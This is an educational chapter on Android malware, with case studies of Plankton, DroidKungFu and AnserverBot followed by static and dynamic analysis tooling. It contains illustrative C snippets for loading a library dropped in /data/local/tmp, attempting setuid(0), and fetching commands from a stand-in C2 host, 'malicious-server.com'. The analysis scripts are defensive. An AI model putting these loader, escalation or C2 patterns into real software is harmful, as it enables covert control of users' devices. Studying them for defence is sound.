Chapter 6: Android Malware
This chapter explores Android malware, including the techniques used by attackers,
various malware types, and tools for static and dynamic analysis.
We will cover notable case studies such as Plankton, DroidKungFu, and AnserverBot.
1. Overview of Android Malware
- Definition: Malware targeting Android devices to exploit vulnerabilities,
gain unauthorized access, steal data, or compromise security.
- Goals:
- Data theft (credentials, SMS messages, call logs, etc.)
- Remote control via command-and-control (C2) servers.
- Monetization through ad fraud or ransomware.
2. Android Malware Characteristics
- Permission Abuse: Requesting unnecessary permissions to access sensitive data.
- Stealth Mechanisms: Using obfuscation, encryption, and hiding in legitimate apps.
- Persistence: Reinstalls itself or adds itself to startup processes.
- Payloads: SMS spam, spyware, ransomware, or cryptocurrency miners.
3. Common Android Malware Types
- Trojanized Apps: Legitimate apps modified with malicious code.
- Spyware: Monitors user activity and transmits data.
- Ransomware: Encrypts files or locks devices, demanding payment for access.
- Adware: Generates revenue through fraudulent ad clicks.
4. Case Studies
Plankton
- Behavior: Injected into legitimate apps to avoid detection and spread through app stores.
- Communicates with remote servers for malicious updates.
Code Example: Dynamic Loading of Malicious Code
#include <jni.h>
#include <android/log.h>
#include <dlfcn.h>

#define LOG_TAG "Plankton_Malware"
#define LOG(...) __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, __VA_ARGS__)

/* Load a native library at runtime, so the payload is absent from the APK's
 * static code; this is the behaviour an analyst looks for in Plankton. */
void dynamic_load(const char *library) {
    void *handle = dlopen(library, RTLD_LAZY);
    if (!handle) {
        LOG("Failed to load library: %s", dlerror());
        return;
    }
    /* Nothing is called from the library in this illustration; it is unloaded
     * immediately. Note that dlopen() already runs the library's constructors. */
    dlclose(handle);
}

JNIEXPORT void JNICALL Java_com_malware_Plankton_execute(JNIEnv *env, jobject obj) {
    (void)env;
    (void)obj;
    LOG("Loading malicious library...");
    dynamic_load("/data/local/tmp/malicious.so");
}
DroidKungFu
- Behavior: Uses privilege escalation exploits to gain root access and hide malicious activities.
Code Example: Privilege Escalation
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* Attempt to gain root privileges. This only succeeds if the process already
     * holds the privilege to change its UID; in an ordinary app sandbox it fails. */
    if (setuid(0) != 0) {
        perror("setuid");
    }
    /* Record the effective identity so the outcome can be checked afterwards. */
    system("id > /data/local/tmp/root_check.txt");
    printf("Privilege escalation attempt executed.\n");
    return 0;
}
AnserverBot
- Behavior: Advanced botnet targeting Android devices. Downloads and executes additional
payloads from remote servers.
Code Example: Command-and-Control Communication
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>

/* Fetch a command from the C2 URL; libcurl writes the response body to stdout
 * unless a write callback is installed. */
void connect_to_c2(const char *url) {
    CURL *curl = curl_easy_init();
    if (curl) {
        curl_easy_setopt(curl, CURLOPT_URL, url);
        curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
        CURLcode res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            fprintf(stderr, "C2 request failed: %s\n", curl_easy_strerror(res));
        }
        curl_easy_cleanup(curl);
    }
}

int main(void) {
    const char *c2_server = "http://malicious-server.com/command";
    curl_global_init(CURL_GLOBAL_DEFAULT);
    printf("Connecting to C2 server...\n");
    connect_to_c2(c2_server);
    curl_global_cleanup();
    return 0;
}
5. Android Security Mechanisms
- Sandboxing: Apps run in isolated environments to prevent interference.
- Permissions: User must explicitly grant sensitive permissions.
- Google Play Protect: Built-in malware protection for Android devices.
- SELinux: Enforces access control policies at the kernel level.
6. Static and Dynamic Analysis of Android Malware
Static Analysis
- Analyze the APK file without executing it.
- Tools: APKTool, JD-GUI, MobSF, dex2jar.
- Extract and inspect the AndroidManifest.xml file for suspicious permissions.
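A small triage script for a decoded AndroidManifest.xml, added here as an example (not code from the chapter): it flags the permissions that match the malware goals above and finds BOOT_COMPLETED receivers used for persistence. The manifest and the suspicious-permission list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"

# Illustrative selection (not an official list) of permissions matching the
# malware goals listed earlier: SMS abuse, data theft, persistence, dropping.
SUSPICIOUS_PERMISSIONS = {
    "android.permission.READ_SMS": "SMS theft",
    "android.permission.RECEIVE_SMS": "SMS interception",
    "android.permission.SEND_SMS": "premium SMS fraud",
    "android.permission.READ_CALL_LOG": "call log theft",
    "android.permission.READ_CONTACTS": "contact exfiltration",
    "android.permission.RECEIVE_BOOT_COMPLETED": "persistence across reboot",
    "android.permission.REQUEST_INSTALL_PACKAGES": "dropping additional payloads",
}

def triage_manifest(manifest_xml: str) -> dict:
    """Return package name, flagged permissions and BOOT_COMPLETED receivers."""
    root = ET.fromstring(manifest_xml)
    findings = {"package": root.get("package"), "flagged": {}, "boot_receivers": []}
    for perm in root.iter("uses-permission"):
        name = perm.get(NAME)
        if name in SUSPICIOUS_PERMISSIONS:
            findings["flagged"][name] = SUSPICIOUS_PERMISSIONS[name]
    # A receiver registered for BOOT_COMPLETED is the classic persistence hook.
    for receiver in root.iter("receiver"):
        for action in receiver.iter("action"):
            if action.get(NAME) == "android.intent.action.BOOT_COMPLETED":
                findings["boot_receivers"].append(receiver.get(NAME))
    return findings

# Constructed sample manifest, written the way apktool decodes one; not a real app.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Flashlight">
        <receiver android:name=".BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""
if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
```

Run it against the manifest produced by `apktool d app.apk` to get the same report for a real sample.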
Dynamic Analysis
- Execute the app in a controlled environment to observe runtime behavior.
- Tools: Frida, Burp Suite, Wireshark, Genymotion.
Dynamic Behavior Script (Frida):
Java.perform(function () {
    // Log every Activity resume so UI events can be correlated with network traffic.
    var Activity = Java.use("android.app.Activity");
    Activity.onResume.implementation = function () {
        console.log("[*] App Resumed");
        this.onResume();
    };
    // Log the URL of each HTTP connection when its response body is read. On a
    // real device the concrete subclass may override getInputStream(), in which
    // case this hook on the abstract class never fires; hook the subclass instead.
    var HttpURLConnection = Java.use("java.net.HttpURLConnection");
    HttpURLConnection.getInputStream.implementation = function () {
        console.log("[*] Intercepted HTTP connection: " + this.getURL());
        return this.getInputStream();
    };
});
7. Tools for Analysis
1. Static Analysis Tools:
- APKTool, JADX, MobSF, dex2jar.
2. Dynamic Analysis Tools:
- Frida, Burp Suite, Wireshark, Genymotion.
3. Additional Tools:
- Drozer, Androguard.